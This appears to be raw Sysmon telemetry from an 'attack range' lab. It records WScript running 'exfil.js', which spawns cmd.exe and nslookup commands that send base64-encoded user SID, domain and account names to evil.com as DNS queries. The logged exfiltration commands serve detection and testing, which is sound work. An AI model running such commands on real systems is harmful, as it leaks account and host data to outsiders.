VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B5-629A-533F-000000005F02}2076C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlesblte.tmp 2>&1 23542300x800000000000000043927Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:22.839{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77F40BD93FC8A7DE101AED42AFEDCB81,SHA256=7A0BE9FBEB4988204D2537A15927B8BD9A79E655708D95DEB1F9E1D14C10677F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.974{2E1864BB-17B7-629A-883F-000000005F02}51645760C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-893F-000000005F02}2256C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.974{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.974{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.974{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.974{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.974{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-893F-000000005F02}2256C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.974{2E1864BB-17B7-629A-873F-000000005F02}70085724C:\Windows\system32\cmd.exe{2E1864BB-17B7-629A-893F-000000005F02}2256C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.985{2E1864BB-17B7-629A-893F-000000005F02}2256C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B7-629A-873F-000000005F02}7008C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlssu.tmp 2>&1 10341000x8000000000000000198160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.959{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-883F-000000005F02}5164C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.959{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-883F-000000005F02}5164C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.959{2E1864BB-17B7-629A-883F-000000005F02}51645760C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-873F-000000005F02}7008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.943{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-883F-000000005F02}5164C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.943{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.943{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.943{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.943{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.943{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-873F-000000005F02}7008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.943{2E1864BB-17A1-629A-783D-000000005F02}55526156C:\Windows\System32\WScript.exe{2E1864BB-17B7-629A-873F-000000005F02}7008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.952{2E1864BB-17B7-629A-873F-000000005F02}7008C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlssu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.943{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlryyjg.tmpMD5=0E5FCD35CD053EF552028604630DF807,SHA256=10CB74BA0B52EDCD250F65D3C712B6E8DE326D18DDB63A8E97ADD31848C9E0E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.912{2E1864BB-17B7-629A-853F-000000005F02}54728028C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-863F-000000005F02}336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.912{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.912{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.912{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.912{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.912{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-863F-000000005F02}336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.912{2E1864BB-17B7-629A-843F-000000005F02}43362788C:\Windows\system32\cmd.exe{2E1864BB-17B7-629A-863F-000000005F02}336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.924{2E1864BB-17B7-629A-863F-000000005F02}336C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B7-629A-843F-000000005F02}4336C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlryyjg.tmp 2>&1 10341000x8000000000000000198140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.896{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-853F-000000005F02}5472C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.896{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-853F-000000005F02}5472C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 